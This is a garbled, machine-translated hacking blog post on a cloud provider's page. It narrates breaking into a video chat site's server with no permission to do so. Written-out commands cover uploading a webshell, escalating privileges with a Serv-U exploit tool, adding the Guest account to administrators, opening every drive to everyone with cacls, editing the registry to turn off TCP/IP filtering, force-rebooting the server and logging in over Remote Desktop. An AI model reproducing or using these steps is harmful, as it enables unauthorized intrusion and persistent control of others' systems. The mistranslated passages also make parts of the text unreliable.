From uploading webshell to breaking through TCP/IP filtering to logging on to 3389 Terminal

Source: Internet
Author: User
Lvhuana
1. Obtain webshell
In a small test this evening, because I am too fond of food, I will not be able to learn more advanced technologies. I can only do this ..........
Everything has passed and there is no way to make up the picture. I hope I can understand this small post.
Today is a boring day. If you are bored at night, you can go to a video chat site to watch the show ~
Suddenly I found a special fire in a chat room. There were already 500 people in the room (full), and I didn't go into the room after being refreshed for n times .......... even more depressing! :(
I think there is nothing to do. Let's test how the host security is done)
Ping cmd to get the IP address of the other party, and then log on to the terminal'
After a long search, I finally found a mobile and vulnerable page at http://www.xxxx.net/upfile_soft.asp, and uploaded a webshell (official version of Haiyang 2005) First (how to upload it is not so cool, and the upload tool is now full of sky ).

2. successfully elevated permissions to create a user
After obtaining the webshell, I log on happily and suddenly found that no permissions are available. I can only compress it in the directory where my webshell is located (C. d. e. drive F cannot be browsed), even the permission to delete the file is not available, depressing ........
Go back to server and check what services are enabled on the host. after discovering that the host has enabled Terminal Services and Serv-U services, ha, now, I started scanning his IP address with superscan, And I saw through the banner that he was using Serv-U, version 5.0.
To wscript. if you can run the CMD command in shell, the command cannot be executed. The command is not reflected after the net user is input. Try again through wscript. shell can execute the CMD command. No, enter the net user again, and then execute the command to return the user list of the other party. Haha, this is good. You can win it !!
Upload the Serv-U lifting tool to D:/a004/tggtwe /****. under the COM/uploadsoft directory, change it to test.exe, and then return to 〖 wscript. run the command in shell. Hey, a fat chicken will be ready soon ~
Run the CMD command through wscript. Shell:
D:/a004/tggtwe/*****. com/uploadsoft/test.exe "Net user guest/active: yes" # activate the Guest account. I like to use this account.
D:/a004/tggtwe/*****. com/uploadsoft/test.exe "Net user guest lvhuana" # Set the password of the Guest account to lvhuana
D:/a004/tggtwe/*****. com/uploadsoft/test.exe "net localgroup administrators guest/Add" # Upgrade the guest permission to the admin permission
Okay. After the account is created, run the net localgroup administrators command to check whether the account is successfully added. The Echo shows that the account is successfully added. Then execute netstat-An and you will see that the port opened by netstat is the default port 3389. OK. Try connecting to it ~

Iii. TCP/IP Filtering
Unable to connect !? Dizzy ...... and then take out superscan to scan his 3389, there is no scanning ...... (open the firewall !? Oh, my point is really back .....)
No way. Go back to wscript. Shell and execute the CMD command:
D:/a004/tggtwe/*****. com/uploadsoft/test.exe "cacls.exe C:/e/T/g everyone: F" # Set drive C to everyone for browsing
D:/a004/tggtwe/*****. com/uploadsoft/test.exe "cacls.exe D:/e/T/g everyone: F" # Set D disk to everyone for browsing
D:/a004/tggtwe/*****. com/uploadsoft/test.exe "cacls.exe E:/e/T/g everyone: F" # Set the E disk to everyone for browsing
D:/a004/tggtwe/*****. com/uploadsoft/test.exe "cacls.exe F:/e/T/g everyone: F" # Set drive F to everyone for browsing
I can at least traverse the entire hard disk. I rummaged around in the hard disk and couldn't find any firewall file. I knew it now, it must have been his TCP/IP screening! (Of course, it is also possible to use the Intranet as a server. You can determine the server based on ipconfig-all)
To break through TCP/IP filtering, we can change the Registry. We need to export three of the Registry, and then import the Registry. we can return to the "wscript" page. shell command:
D:/a004/tggtwe /****. COM/uploadsoft/test.exe "Regedit-e d:/a004/tggtwe /****. COM/uploadsoft/1.reg HKEY_LOCAL_MACHINE/system/controlset001/services/TCPIP "# export the first part of TCP/IP filtering in the Registry
D:/a004/tggtwe /****. COM/uploadsoft/test.exe "Regedit-e d:/a004/tggtwe /****. COM/uploadsoft/2.reg HKEY_LOCAL_MACHINE/system/controlset002/services/TCPIP "# export the second part about TCP/IP filtering in the Registry
D:/a004/tggtwe /****. COM/uploadsoft/test.exe "Regedit-e d:/a004/tggtwe /****. COM/uploadsoft/3.reg HKEY_LOCAL_MACHINE/system/CurrentControlSet/services/TCPIP "# export the third part about TCP/IP filtering in the Registry
Then return to stream or FSO and find that 1.reg, 2.reg, 3. Reg has been quietly lying there ~
Set 1.reg, 2.reg, 3. reg is downloaded back to your hard disk and edited. Change the TCP/IP filtering areas. 1. reg finds "enablesecurityfilters" = DWORD: 00000001, changes the last number 1 to 0, and then changes 2.reg, 3.reg. the change method is the same, and I will not be arrogant ~
Then we set 1.reg, 2.reg, 3. reg then returns the data to the target machine (Here we want to select the overwrite mode, because we do not have the permission to delete the original 1.reg, 2.reg, 3.reg). After the upload is successful, we will return to the 〖 wscript. shell command:
D:/a004/tggtwe /****. COM/uploadsoft/test.exe "Regedit-s d:/a004/tggtwe /****. COM/uploadsoft/1.reg" # In quiet mode, 1. reg import to his registry
D:/a004/tggtwe /****. COM/uploadsoft/test.exe "Regedit-s d:/a004/tggtwe /****. COM/uploadsoft/2.reg" # In quiet mode, complete the modification. reg import to his registry
D:/a004/tggtwe /****. COM/uploadsoft/test.exe "Regedit-s d:/a004/tggtwe /****. COM/uploadsoft/3.reg" #3. reg import to his registry
OK! After the import, restart the machine and solve the TCP/IP filtering problem. Then, run the CMD command in "wscript. Shell:
D:/a004/tggtwe /****. COM/uploadsoft/test.exe "iisreset/reboot/Timeout: 00" # use his own IIS service to restart his machine. The/Timeout: 00 parameter allows him to restart immediately
After the execution, we can no longer use superscan to scan him ~ Restarted!

4. log on to the Apsara stack console successfully.
After a long wait (in fact, the time is not long, but I can't wait here, hey ~), Finally, I can use superscan to scan him and scan him to port 3389. Haha, I finally succeeded. I took out the terminal login device and used the user: Guest, pass: I just created: lvhuana is logged on!
Okay, this spam article should be over now. It's already early in the morning, and it's time to close the job and go to bed ~ Because I am too fond of food, mistakes are inevitable, and I hope you can correct them!
(If there is a reprinted copy, please include the author information, it is not easy to write, so long .............)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.